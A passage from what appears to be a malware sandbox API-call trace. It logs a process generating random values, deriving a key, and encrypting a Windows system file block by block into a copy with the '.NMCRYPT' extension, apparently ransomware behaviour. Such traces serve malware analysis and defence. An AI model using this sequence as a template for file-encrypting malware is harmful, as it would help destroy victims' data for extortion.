pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.310] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.311] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.311] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.312] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0148.312] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.312] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad8b8) returned 1 [0148.312] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.312] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.312] wcslen (_String="\\\\?\\") returned 0x4 [0148.312] CryptDuplicateKey (in: hKey=0x9ad8b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad4b8) returned 1 [0148.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.312] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0148.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.313] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.314] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.314] GetLastError () returned 0x0 [0148.314] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.315] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.315] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.315] GetLastError () returned 0x0 [0148.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.315] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.315] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.315] GetLastError () returned 0x0 [0148.315] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.315] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.316] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.316] GetLastError () returned 0x0 [0148.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.316] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.316] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.316] GetLastError () returned 0x0 [0148.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.316] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.316] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.316] GetLastError () returned 0x0 [0148.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.316] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.316] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.316] GetLastError () returned 0x0 [0148.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.316] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.316] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.316] GetLastError () returned 0x0 [0148.316] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.316] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: 